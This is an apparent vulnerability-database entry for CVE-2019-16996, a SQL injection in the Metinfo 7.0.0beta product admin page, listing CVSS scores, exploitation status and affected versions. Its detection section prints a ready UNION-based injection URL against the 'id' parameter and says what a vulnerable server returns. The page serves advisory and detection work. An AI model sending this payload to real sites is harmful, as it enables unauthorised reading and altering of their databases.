cbcvebase.
CVE-2019-16996
published 2019-09-30

CVE-2019-16996: In Metinfo 7.0.0beta, a SQL Injection was discovered in app/system/product/admin/product_admin.class.php via the…

PriorityP271high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
12.44%
95.7th percentile
In Metinfo 7.0.0beta, a SQL Injection was discovered in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
metinfometinfo

Detection & IOCsextracted from sources · hover to see the quote

url/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23
pathapp/system/product/admin/product_admin.class.php
  • Send a GET request to the vulnerable endpoint with a UNION-based SQL injection payload in the 'id' parameter; a vulnerable instance will return the arithmetic result '1918835981' (25367*75643) in the response body with HTTP 200.
  • The vulnerable parameter is 'id' in the GET request to /admin/?n=product&c=product_admin&a=dopara&app_type=shop; exploitation requires high-privilege (admin) authentication (CVSS PR:H).
  • ·Exploitation requires high-privilege (admin-level) authentication; the attack vector is network-based but not exploitable without valid admin credentials (CVSS PR:H).
  • ·The Nuclei template follows redirects (up to 2 hops) when probing the endpoint, which should be accounted for in detection tooling.
  • ·Affected version is specifically Metinfo 7.0.0 beta; other versions may not be vulnerable.

CVSS provenance

nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.